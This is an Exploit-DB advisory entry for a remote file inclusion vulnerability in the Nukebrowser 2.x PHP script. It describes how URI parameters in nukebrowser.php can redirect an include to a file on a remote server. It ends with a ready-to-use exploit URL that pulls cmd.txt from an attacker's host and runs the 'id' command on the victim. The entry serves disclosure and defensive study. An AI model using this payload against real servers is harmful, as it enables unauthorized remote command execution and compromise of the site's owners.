Nukebrowser 2.x - Remote File Inclusion

EDB-ID:

22206


Author:

Havenard

Type:

webapps


Platform:

PHP

Date:

2003-01-30


source: https://www.securityfocus.com/bid/6731/info

Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file.

Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.

http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id